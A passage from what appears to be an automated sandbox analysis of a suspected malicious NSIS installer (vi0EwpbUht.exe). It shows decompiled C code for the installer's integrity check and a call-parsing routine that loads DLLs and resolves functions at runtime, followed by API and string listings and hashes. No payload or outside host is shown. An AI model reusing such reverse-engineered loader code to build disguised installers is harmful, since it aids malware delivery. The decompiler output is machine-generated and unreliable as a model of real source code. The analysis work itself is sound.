                                                                                                                          						if((_t77 & 0xfffffff0) != 0) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v40 - 0xdeadbeef;
                                                                                                                          						if(_v40 != 0xdeadbeef) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v28 - 0x74736e49;
                                                                                                                          						if(_v28 != 0x74736e49) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v32 - 0x74666f73;
                                                                                                                          						if(_v32 != 0x74666f73) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _v36 - 0x6c6c754e;
                                                                                                                          						if(_v36 != 0x6c6c754e) {
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						_a4 = _a4 | _t77;
                                                                                                                          						_t87 =  *0x40b018; // 0x7e00
                                                                                                                          						 *0x423f20 =  *0x423f20 | _a4 & 0x00000002;
                                                                                                                          						_t80 = _v20;
                                                                                                                          						__eflags = _t80 - _t93;
                                                                                                                          						 *0x423e94 = _t87;
                                                                                                                          						if(_t80 > _t93) {
                                                                                                                          							goto L29;
                                                                                                                          						}
                                                                                                                          						__eflags = _a4 & 0x00000008;
                                                                                                                          						if((_a4 & 0x00000008) != 0) {
                                                                                                                          							L16:
                                                                                                                          							_v8 = _v8 + 1;
                                                                                                                          							_t24 = _t80 - 4; // 0x40915c
                                                                                                                          							_t93 = _t24;
                                                                                                                          							__eflags = _t90 - _t93;
                                                                                                                          							if(_t90 > _t93) {
                                                                                                                          								_t90 = _t93;
                                                                                                                          							}
                                                                                                                          							goto L20;
                                                                                                                          						}
                                                                                                                          						__eflags = _a4 & 0x00000004;
                                                                                                                          						if((_a4 & 0x00000004) != 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						goto L16;
                                                                                                                          						L20:
                                                                                                                          						__eflags = _t93 -  *0x41f028;
                                                                                                                          						if(_t93 <  *0x41f028) {
                                                                                                                          							_v12 = E00405D6B(_v12, 0x417028, _t90);
                                                                                                                          						}
                                                                                                                          						 *0x40b018 =  *0x40b018 + _t90;
                                                                                                                          						_t93 = _t93 - _t90;
                                                                                                                          						__eflags = _t93;
                                                                                                                          					} while (_t93 > 0);
                                                                                                                          					_t82 = 0;
                                                                                                                          					__eflags = 0;
                                                                                                                          					goto L24;
                                                                                                                          				}
                                                                                                                          			}


































                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,00000400), ref: 00402C4F
                                                                                                                            • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 004056B8
                                                                                                                            • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,80000000,00000003), ref: 00402C9B
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
                                                                                                                          • C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C
                                                                                                                          • C:\Users\user\AppData\Local\Temp\3582-490, xrefs: 00402C7D, 00402C82, 00402C88
                                                                                                                          • soft, xrefs: 00402D10
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 00402C2C
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
                                                                                                                          • Error launching installer, xrefs: 00402C72
                                                                                                                          • (pA, xrefs: 00402CB0
                                                                                                                          • Inst, xrefs: 00402D07
                                                                                                                          • Null, xrefs: 00402D19
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $(pA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\3582-490$C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                          • API String ID: 4283519449-47137485
                                                                                                                          • Opcode ID: ab55cb2fb14d04616f822991b63ec3f26e4c66ae60ff675e8b93a203c080f69e
                                                                                                                          • Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
                                                                                                                          • Opcode Fuzzy Hash: ab55cb2fb14d04616f822991b63ec3f26e4c66ae60ff675e8b93a203c080f69e
                                                                                                                          • Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E10001D3B() {
                                                                                                                          				void* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				CHAR* _v24;
                                                                                                                          				CHAR* _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				CHAR* _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				void* _v52;
                                                                                                                          				CHAR* _t180;
                                                                                                                          				void* _t182;
                                                                                                                          				signed int _t183;
                                                                                                                          				void* _t186;
                                                                                                                          				void* _t188;
                                                                                                                          				CHAR* _t190;
                                                                                                                          				void* _t198;
                                                                                                                          				struct HINSTANCE__* _t199;
                                                                                                                          				_Unknown_base(*)()* _t200;
                                                                                                                          				_Unknown_base(*)()* _t202;
                                                                                                                          				struct HINSTANCE__* _t203;
                                                                                                                          				void* _t205;
                                                                                                                          				char* _t206;
                                                                                                                          				_Unknown_base(*)()* _t207;
                                                                                                                          				void* _t218;
                                                                                                                          				signed char _t219;
                                                                                                                          				void* _t224;
                                                                                                                          				struct HINSTANCE__* _t226;
                                                                                                                          				void* _t227;
                                                                                                                          				void* _t228;
                                                                                                                          				void* _t232;
                                                                                                                          				void* _t235;
                                                                                                                          				void* _t237;
                                                                                                                          				void* _t244;
                                                                                                                          				void* _t245;
                                                                                                                          				void* _t248;
                                                                                                                          				struct HINSTANCE__* _t253;
                                                                                                                          				CHAR* _t254;
                                                                                                                          				signed char _t257;
                                                                                                                          				void _t258;
                                                                                                                          				void* _t259;
                                                                                                                          				void* _t266;
                                                                                                                          				void* _t267;
                                                                                                                          				void* _t271;
                                                                                                                          				void* _t272;
                                                                                                                          				void* _t276;
                                                                                                                          				void* _t277;
                                                                                                                          				void* _t278;
                                                                                                                          				void* _t279;
                                                                                                                          				signed char _t282;
                                                                                                                          				signed int _t283;
                                                                                                                          				CHAR* _t284;
                                                                                                                          				CHAR* _t286;
                                                                                                                          				struct HINSTANCE__* _t288;
                                                                                                                          				void* _t290;
                                                                                                                          				void* _t291;
                                                                                                                          
                                                                                                                          				_t253 = 0;
                                                                                                                          				_v32 = 0;
                                                                                                                          				_v36 = 0;
                                                                                                                          				_v16 = 0;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_v40 = 0;
                                                                                                                          				_t291 = 0;
                                                                                                                          				_t180 = E10001541();
                                                                                                                          				_v24 = _t180;
                                                                                                                          				_v28 = _t180;
                                                                                                                          				_v44 = E10001541();
                                                                                                                          				_t182 = E10001561();
                                                                                                                          				_v52 = _t182;
                                                                                                                          				_v8 = _t182;
                                                                                                                          				while(1) {
                                                                                                                          					_t183 = _v32;
                                                                                                                          					_t283 = 3;
                                                                                                                          					_v48 = _t183;
                                                                                                                          					if(_t183 != _t253 && _t291 == _t253) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t282 =  *_v8;
                                                                                                                          					_t257 = _t282;
                                                                                                                          					_t186 = _t257 - _t253;
                                                                                                                          					if(_t186 == 0) {
                                                                                                                          						_t29 =  &_v32;
                                                                                                                          						 *_t29 = _v32 | 0xffffffff;
                                                                                                                          						__eflags =  *_t29;
                                                                                                                          						L13:
                                                                                                                          						_t188 = _v48 - _t253;
                                                                                                                          						if(_t188 == 0) {
                                                                                                                          							 *_v28 =  *_v28 & 0x00000000;
                                                                                                                          							__eflags = _t291 - _t253;
                                                                                                                          							if(_t291 == _t253) {
                                                                                                                          								_t224 = GlobalAlloc(0x40, 0x14a4); // executed
                                                                                                                          								_t291 = _t224;
                                                                                                                          								 *(_t291 + 0x810) = _t253;
                                                                                                                          								 *(_t291 + 0x814) = _t253;
                                                                                                                          							}
                                                                                                                          							_t258 = _v36;
                                                                                                                          							_t39 = _t291 + 8; // 0x8
                                                                                                                          							_t190 = _t39;
                                                                                                                          							_t40 = _t291 + 0x408; // 0x408
                                                                                                                          							_t284 = _t40;
                                                                                                                          							 *_t291 = _t258;
                                                                                                                          							 *_t190 =  *_t190 & 0x00000000;
                                                                                                                          							 *(_t291 + 0x808) = _t253;
                                                                                                                          							 *_t284 =  *_t284 & 0x00000000;
                                                                                                                          							_t259 = _t258 - _t253;
                                                                                                                          							__eflags = _t259;
                                                                                                                          							 *(_t291 + 0x80c) = _t253;
                                                                                                                          							 *(_t291 + 4) = _t253;
                                                                                                                          							if(_t259 == 0) {
                                                                                                                          								__eflags = _v28 - _v24;
                                                                                                                          								if(_v28 == _v24) {
                                                                                                                          									goto L56;
                                                                                                                          								}
                                                                                                                          								_t290 = 0;
                                                                                                                          								GlobalFree(_t291);
                                                                                                                          								_t291 = E10001641(_v24);
                                                                                                                          								__eflags = _t291 - _t253;
                                                                                                                          								if(_t291 == _t253) {
                                                                                                                          									goto L56;
                                                                                                                          								} else {
                                                                                                                          									goto L28;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L28:
                                                                                                                          									_t218 =  *(_t291 + 0x14a0);
                                                                                                                          									__eflags = _t218 - _t253;
                                                                                                                          									if(_t218 == _t253) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_t290 = _t291;
                                                                                                                          									_t291 = _t218;
                                                                                                                          									__eflags = _t291 - _t253;
                                                                                                                          									if(_t291 != _t253) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eflags = _t290 - _t253;
                                                                                                                          								if(_t290 != _t253) {
                                                                                                                          									 *(_t290 + 0x14a0) = _t253;
                                                                                                                          								}
                                                                                                                          								_t219 =  *(_t291 + 0x810);
                                                                                                                          								__eflags = _t219 & 0x00000008;
                                                                                                                          								if((_t219 & 0x00000008) == 0) {
                                                                                                                          									 *(_t291 + 0x810) = _t219 | 0x00000002;
                                                                                                                          								} else {
                                                                                                                          									_t291 = E1000187C(_t291);
                                                                                                                          									 *(_t291 + 0x810) =  *(_t291 + 0x810) & 0xfffffff5;
                                                                                                                          								}
                                                                                                                          								goto L56;
                                                                                                                          							} else {
                                                                                                                          								_t266 = _t259 - 1;
                                                                                                                          								__eflags = _t266;
                                                                                                                          								if(_t266 == 0) {
                                                                                                                          									L24:
                                                                                                                          									lstrcpyA(_t190, _v44);
                                                                                                                          									L25:
                                                                                                                          									lstrcpyA(_t284, _v24);
                                                                                                                          									L56:
                                                                                                                          									_v28 = _v24;
                                                                                                                          									L57:
                                                                                                                          									_v8 = _v8 + 1;
                                                                                                                          									if(_v32 != 0xffffffff) {
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t267 = _t266 - 1;
                                                                                                                          								__eflags = _t267;
                                                                                                                          								if(_t267 == 0) {
                                                                                                                          									goto L25;
                                                                                                                          								}
                                                                                                                          								__eflags = _t267 != 1;
                                                                                                                          								if(_t267 != 1) {
                                                                                                                          									goto L56;
                                                                                                                          								}
                                                                                                                          								goto L24;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t188 == 1) {
                                                                                                                          							_t226 = _v16;
                                                                                                                          							if(_v40 == _t253) {
                                                                                                                          								_t226 = _t226 - 1;
                                                                                                                          							}
                                                                                                                          							 *(_t291 + 0x814) = _t226;
                                                                                                                          						}
                                                                                                                          						goto L56;
                                                                                                                          					}
                                                                                                                          					_t227 = _t186 - 0x23;
                                                                                                                          					if(_t227 == 0) {
                                                                                                                          						_v32 = _t253;
                                                                                                                          						_v36 = _t253;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					_t228 = _t227 - 5;
                                                                                                                          					if(_t228 == 0) {
                                                                                                                          						__eflags = _v36 - _t283;
                                                                                                                          						_v32 = 1;
                                                                                                                          						_v12 = _t253;
                                                                                                                          						_v20 = _t253;
                                                                                                                          						_v16 = (0 | _v36 == _t283) + 1;
                                                                                                                          						_v40 = _t253;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					_t232 = _t228 - 1;
                                                                                                                          					if(_t232 == 0) {
                                                                                                                          						_v32 = 2;
                                                                                                                          						_v12 = _t253;
                                                                                                                          						_v20 = _t253;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          					if(_t232 != 0x16) {
                                                                                                                          						_t235 = _v32 - _t253;
                                                                                                                          						__eflags = _t235;
                                                                                                                          						if(_t235 == 0) {
                                                                                                                          							__eflags = _t282 - 0x2a;
                                                                                                                          							if(_t282 == 0x2a) {
                                                                                                                          								_v36 = 2;
                                                                                                                          								L55:
                                                                                                                          								_t253 = 0;
                                                                                                                          								__eflags = 0;
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							__eflags = _t282 - 0x2d;
                                                                                                                          							if(_t282 == 0x2d) {
                                                                                                                          								L124:
                                                                                                                          								_t237 = _v8 + 1;
                                                                                                                          								__eflags =  *_t237 - 0x3e;
                                                                                                                          								if( *_t237 != 0x3e) {
                                                                                                                          									L126:
                                                                                                                          									_t237 = _v8 + 1;
                                                                                                                          									__eflags =  *_t237 - 0x3a;
                                                                                                                          									if( *_t237 != 0x3a) {
                                                                                                                          										L133:
                                                                                                                          										_v28 =  &(_v28[1]);
                                                                                                                          										 *_v28 = _t282;
                                                                                                                          										goto L57;
                                                                                                                          									}
                                                                                                                          									__eflags = _t282 - 0x2d;
                                                                                                                          									if(_t282 == 0x2d) {
                                                                                                                          										goto L133;
                                                                                                                          									}
                                                                                                                          									_v36 = 1;
                                                                                                                          									L129:
                                                                                                                          									_v8 = _t237;
                                                                                                                          									__eflags = _v28 - _v24;
                                                                                                                          									if(_v28 <= _v24) {
                                                                                                                          										 *_v44 =  *_v44 & 0x00000000;
                                                                                                                          									} else {
                                                                                                                          										 *_v28 =  *_v28 & 0x00000000;
                                                                                                                          										lstrcpyA(_v44, _v24);
                                                                                                                          									}
                                                                                                                          									goto L55;
                                                                                                                          								}
                                                                                                                          								_v36 = _t283;
                                                                                                                          								goto L129;
                                                                                                                          							}
                                                                                                                          							__eflags = _t282 - 0x3a;
                                                                                                                          							if(_t282 != 0x3a) {
                                                                                                                          								goto L133;
                                                                                                                          							}
                                                                                                                          							__eflags = _t282 - 0x2d;
                                                                                                                          							if(_t282 != 0x2d) {
                                                                                                                          								goto L126;
                                                                                                                          							}
                                                                                                                          							goto L124;
                                                                                                                          						}
                                                                                                                          						_t244 = _t235 - 1;
                                                                                                                          						__eflags = _t244;
                                                                                                                          						if(_t244 == 0) {
                                                                                                                          							L68:
                                                                                                                          							_t245 = _t257 - 0x22;
                                                                                                                          							__eflags = _t245 - 0x55;
                                                                                                                          							if(_t245 > 0x55) {
                                                                                                                          								goto L55;
                                                                                                                          							}
                                                                                                                          							switch( *((intOrPtr*)(( *(_t245 + 0x100023a0) & 0x000000ff) * 4 +  &M10002344))) {
                                                                                                                          								case 0:
                                                                                                                          									__eax = _v24;
                                                                                                                          									__edi = _v8;
                                                                                                                          									while(1) {
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										_v8 = __edi;
                                                                                                                          										__cl =  *__edi;
                                                                                                                          										__eflags = __cl - __dl;
                                                                                                                          										if(__cl != __dl) {
                                                                                                                          											goto L108;
                                                                                                                          										}
                                                                                                                          										L107:
                                                                                                                          										__eflags =  *(__edi + 1) - __dl;
                                                                                                                          										if( *(__edi + 1) != __dl) {
                                                                                                                          											L112:
                                                                                                                          											 *__eax =  *__eax & 0x00000000;
                                                                                                                          											__ebx = E10001550(_v24);
                                                                                                                          											goto L84;
                                                                                                                          										}
                                                                                                                          										L108:
                                                                                                                          										__eflags = __cl;
                                                                                                                          										if(__cl == 0) {
                                                                                                                          											goto L112;
                                                                                                                          										}
                                                                                                                          										__eflags = __cl - __dl;
                                                                                                                          										if(__cl == __dl) {
                                                                                                                          											__edi = __edi + 1;
                                                                                                                          											__eflags = __edi;
                                                                                                                          										}
                                                                                                                          										__cl =  *__edi;
                                                                                                                          										 *__eax =  *__edi;
                                                                                                                          										__eax = __eax + 1;
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										_v8 = __edi;
                                                                                                                          										__cl =  *__edi;
                                                                                                                          										__eflags = __cl - __dl;
                                                                                                                          										if(__cl != __dl) {
                                                                                                                          											goto L108;
                                                                                                                          										}
                                                                                                                          										goto L107;
                                                                                                                          									}
                                                                                                                          								case 1:
                                                                                                                          									_v12 = 1;
                                                                                                                          									goto L55;
                                                                                                                          								case 2:
                                                                                                                          									_v12 = _v12 | 0xffffffff;
                                                                                                                          									goto L55;
                                                                                                                          								case 3:
                                                                                                                          									_v12 = _v12 & 0x00000000;
                                                                                                                          									_v20 = _v20 & 0x00000000;
                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                          									goto L73;
                                                                                                                          								case 4:
                                                                                                                          									__eflags = _v20;
                                                                                                                          									if(_v20 != 0) {
                                                                                                                          										goto L55;
                                                                                                                          									}
                                                                                                                          									_v8 = _v8 - 1;
                                                                                                                          									__ebx = E10001541();
                                                                                                                          									 &_v8 = E10001CD9( &_v8);
                                                                                                                          									__eax = E1000176C(__edx, __eax, __edx, __ebx);
                                                                                                                          									goto L84;
                                                                                                                          								case 5:
                                                                                                                          									L92:
                                                                                                                          									_v20 = _v20 + 1;
                                                                                                                          									goto L55;
                                                                                                                          								case 6:
                                                                                                                          									_push(0x19);
                                                                                                                          									goto L119;
                                                                                                                          								case 7:
                                                                                                                          									_push(0x15);
                                                                                                                          									goto L119;
                                                                                                                          								case 8:
                                                                                                                          									_push(0x16);
                                                                                                                          									goto L119;
                                                                                                                          								case 9:
                                                                                                                          									_push(0x18);
                                                                                                                          									goto L119;
                                                                                                                          								case 0xa:
                                                                                                                          									_push(5);
                                                                                                                          									goto L99;
                                                                                                                          								case 0xb:
                                                                                                                          									__eax = 0;
                                                                                                                          									__eax = 1;
                                                                                                                          									goto L78;
                                                                                                                          								case 0xc:
                                                                                                                          									_push(6);
                                                                                                                          									goto L99;
                                                                                                                          								case 0xd:
                                                                                                                          									_push(2);
                                                                                                                          									goto L99;
                                                                                                                          								case 0xe:
                                                                                                                          									_push(3);
                                                                                                                          									goto L99;
                                                                                                                          								case 0xf:
                                                                                                                          									_push(0x17);
                                                                                                                          									L119:
                                                                                                                          									_pop(__ebx);
                                                                                                                          									goto L85;
                                                                                                                          								case 0x10:
                                                                                                                          									__eax =  &_v8;
                                                                                                                          									__eax = E10001CD9( &_v8);
                                                                                                                          									__ebx = __eax;
                                                                                                                          									__ebx = __eax + 1;
                                                                                                                          									__eflags = __ebx - 0xb;
                                                                                                                          									if(__ebx < 0xb) {
                                                                                                                          										__ebx = __ebx + 0xa;
                                                                                                                          									}
                                                                                                                          									goto L84;
                                                                                                                          								case 0x11:
                                                                                                                          									__ebx = 0xffffffff;
                                                                                                                          									goto L85;
                                                                                                                          								case 0x12:
                                                                                                                          									__eax = 0;
                                                                                                                          									__eflags = 0;
                                                                                                                          									goto L78;
                                                                                                                          								case 0x13:
                                                                                                                          									_push(4);
                                                                                                                          									L99:
                                                                                                                          									_pop(__eax);
                                                                                                                          									L78:
                                                                                                                          									__edx = _v16;
                                                                                                                          									__ecx = 0;
                                                                                                                          									__edx = _v16 << 5;
                                                                                                                          									__ecx = 1;
                                                                                                                          									__eflags = _v12 - 0xffffffff;
                                                                                                                          									__edi = (_v16 << 5) + __esi;
                                                                                                                          									_v40 = 1;
                                                                                                                          									 *(__edi + 0x818) = __eax;
                                                                                                                          									if(_v12 == 0xffffffff) {
                                                                                                                          										L80:
                                                                                                                          										__eax = __ecx;
                                                                                                                          										L81:
                                                                                                                          										__eflags = _v12 - __ecx;
                                                                                                                          										 *(__edi + 0x828) = __eax;
                                                                                                                          										if(_v12 == __ecx) {
                                                                                                                          											__eax =  &_v8;
                                                                                                                          											__eax = E10001CD9( &_v8);
                                                                                                                          											__eax = __eax + 1;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											_v12 = __eax;
                                                                                                                          										}
                                                                                                                          										__eax = _v12;
                                                                                                                          										 *((intOrPtr*)(__edi + 0x81c)) = _v12;
                                                                                                                          										_t126 = _v16 + 0x41; // 0x41
                                                                                                                          										_t126 = _t126 << 5;
                                                                                                                          										__eax = 0;
                                                                                                                          										__eflags = 0;
                                                                                                                          										 *((intOrPtr*)((_t126 << 5) + __esi)) = 0;
                                                                                                                          										 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                                                                                          										 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                                                                                          										goto L84;
                                                                                                                          									}
                                                                                                                          									__eax =  *(0x10003058 + __eax * 4);
                                                                                                                          									__eflags = __eax;
                                                                                                                          									if(__eax > 0) {
                                                                                                                          										goto L81;
                                                                                                                          									}
                                                                                                                          									goto L80;
                                                                                                                          								case 0x14:
                                                                                                                          									_t247 =  *(_t291 + 0x814);
                                                                                                                          									__eflags = _t247 - _v16;
                                                                                                                          									if(_t247 > _v16) {
                                                                                                                          										_v16 = _t247;
                                                                                                                          									}
                                                                                                                          									_v12 = _v12 & 0x00000000;
                                                                                                                          									_v20 = _v20 & 0x00000000;
                                                                                                                          									_v36 - 3 = _t247 - (_v36 == 3);
                                                                                                                          									if(_t247 != _v36 == 3) {
                                                                                                                          										L73:
                                                                                                                          										_v40 = 1;
                                                                                                                          									}
                                                                                                                          									goto L55;
                                                                                                                          								case 0x15:
                                                                                                                          									__eax =  &_v8;
                                                                                                                          									__eax = E10001CD9( &_v8);
                                                                                                                          									__ebx = __eax;
                                                                                                                          									__ebx = __eax + 1;
                                                                                                                          									L84:
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									if(__ebx == 0) {
                                                                                                                          										goto L55;
                                                                                                                          									}
                                                                                                                          									L85:
                                                                                                                          									__eflags = _v20;
                                                                                                                          									_v40 = 1;
                                                                                                                          									if(_v20 != 0) {
                                                                                                                          										L90:
                                                                                                                          										__eflags = _v20 - 1;
                                                                                                                          										if(_v20 == 1) {
                                                                                                                          											__eax = _v16;
                                                                                                                          											__eax = _v16 << 5;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											 *(__eax + __esi + 0x830) = __ebx;
                                                                                                                          										}
                                                                                                                          										goto L92;
                                                                                                                          									}
                                                                                                                          									_v16 = _v16 << 5;
                                                                                                                          									_t134 = __esi + 0x82c; // 0x82c
                                                                                                                          									__edi = (_v16 << 5) + _t134;
                                                                                                                          									__eax =  *__edi;
                                                                                                                          									__eflags = __eax - 0xffffffff;
                                                                                                                          									if(__eax <= 0xffffffff) {
                                                                                                                          										L88:
                                                                                                                          										__eax = GlobalFree(__eax);
                                                                                                                          										L89:
                                                                                                                          										 *__edi = __ebx;
                                                                                                                          										goto L90;
                                                                                                                          									}
                                                                                                                          									__eflags = __eax - 0x19;
                                                                                                                          									if(__eax <= 0x19) {
                                                                                                                          										goto L89;
                                                                                                                          									}
                                                                                                                          									goto L88;
                                                                                                                          								case 0x16:
                                                                                                                          									goto L55;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t248 = _t244 - 1;
                                                                                                                          						__eflags = _t248;
                                                                                                                          						if(_t248 == 0) {
                                                                                                                          							_v16 = _t253;
                                                                                                                          							goto L68;
                                                                                                                          						}
                                                                                                                          						__eflags = _t248 != 1;
                                                                                                                          						if(_t248 != 1) {
                                                                                                                          							goto L133;
                                                                                                                          						}
                                                                                                                          						_t271 = _t257 - 0x21;
                                                                                                                          						__eflags = _t271;
                                                                                                                          						if(_t271 == 0) {
                                                                                                                          							_v12 =  ~_v12;
                                                                                                                          							goto L55;
                                                                                                                          						}
                                                                                                                          						_t272 = _t271 - 0x42;
                                                                                                                          						__eflags = _t272;
                                                                                                                          						if(_t272 == 0) {
                                                                                                                          							L51:
                                                                                                                          							__eflags = _v12 - 1;
                                                                                                                          							if(_v12 != 1) {
                                                                                                                          								_t84 = _t291 + 0x810;
                                                                                                                          								 *_t84 =  *(_t291 + 0x810) &  !0x00000001;
                                                                                                                          								__eflags =  *_t84;
                                                                                                                          							} else {
                                                                                                                          								 *(_t291 + 0x810) =  *(_t291 + 0x810) | 1;
                                                                                                                          							}
                                                                                                                          							_v12 = 1;
                                                                                                                          							goto L55;
                                                                                                                          						}
                                                                                                                          						_t276 = _t272;
                                                                                                                          						__eflags = _t276;
                                                                                                                          						if(_t276 == 0) {
                                                                                                                          							_push(0x20);
                                                                                                                          							L50:
                                                                                                                          							_pop(1);
                                                                                                                          							goto L51;
                                                                                                                          						}
                                                                                                                          						_t277 = _t276 - 9;
                                                                                                                          						__eflags = _t277;
                                                                                                                          						if(_t277 == 0) {
                                                                                                                          							_push(8);
                                                                                                                          							goto L50;
                                                                                                                          						}
                                                                                                                          						_push(4);
                                                                                                                          						_pop(1);
                                                                                                                          						_t278 = _t277 - 1;
                                                                                                                          						__eflags = _t278;
                                                                                                                          						if(_t278 == 0) {
                                                                                                                          							goto L51;
                                                                                                                          						}
                                                                                                                          						_t279 = _t278 - 1;
                                                                                                                          						__eflags = _t279;
                                                                                                                          						if(_t279 == 0) {
                                                                                                                          							_push(0x10);
                                                                                                                          							goto L50;
                                                                                                                          						}
                                                                                                                          						__eflags = _t279 != 0;
                                                                                                                          						if(_t279 != 0) {
                                                                                                                          							goto L55;
                                                                                                                          						}
                                                                                                                          						_push(0x40);
                                                                                                                          						goto L50;
                                                                                                                          					} else {
                                                                                                                          						_v32 = _t283;
                                                                                                                          						_v12 = 1;
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				GlobalFree(_v52);
                                                                                                                          				GlobalFree(_v24);
                                                                                                                          				GlobalFree(_v44);
                                                                                                                          				if(_t291 == _t253 ||  *(_t291 + 0x80c) != _t253) {
                                                                                                                          					L145:
                                                                                                                          					return _t291;
                                                                                                                          				} else {
                                                                                                                          					_t198 =  *_t291 - 1;
                                                                                                                          					if(_t198 == 0) {
                                                                                                                          						_t169 = _t291 + 8; // 0x8
                                                                                                                          						_t286 = _t169;
                                                                                                                          						__eflags =  *_t286;
                                                                                                                          						if( *_t286 != 0) {
                                                                                                                          							_t199 = GetModuleHandleA(_t286);
                                                                                                                          							__eflags = _t199 - _t253;
                                                                                                                          							 *(_t291 + 0x808) = _t199;
                                                                                                                          							if(_t199 != _t253) {
                                                                                                                          								L141:
                                                                                                                          								_t173 = _t291 + 0x408; // 0x408
                                                                                                                          								_t254 = _t173;
                                                                                                                          								_t200 = GetProcAddress( *(_t291 + 0x808), _t254);
                                                                                                                          								__eflags = _t200;
                                                                                                                          								 *(_t291 + 0x80c) = _t200;
                                                                                                                          								if(_t200 != 0) {
                                                                                                                          									goto L145;
                                                                                                                          								}
                                                                                                                          								lstrcatA(_t254, 0x10004024);
                                                                                                                          								_t202 = GetProcAddress( *(_t291 + 0x808), _t254);
                                                                                                                          								__eflags = _t202;
                                                                                                                          								L143:
                                                                                                                          								 *(_t291 + 0x80c) = _t202;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									goto L145;
                                                                                                                          								}
                                                                                                                          								L144:
                                                                                                                          								_t178 = _t291 + 4;
                                                                                                                          								 *_t178 =  *(_t291 + 4) | 0xffffffff;
                                                                                                                          								__eflags =  *_t178;
                                                                                                                          								goto L145;
                                                                                                                          							}
                                                                                                                          							_t203 = LoadLibraryA(_t286);
                                                                                                                          							__eflags = _t203 - _t253;
                                                                                                                          							 *(_t291 + 0x808) = _t203;
                                                                                                                          							if(_t203 == _t253) {
                                                                                                                          								goto L144;
                                                                                                                          							}
                                                                                                                          							goto L141;
                                                                                                                          						}
                                                                                                                          						_t170 = _t291 + 0x408; // 0x408
                                                                                                                          						_t202 = E10001641(_t170);
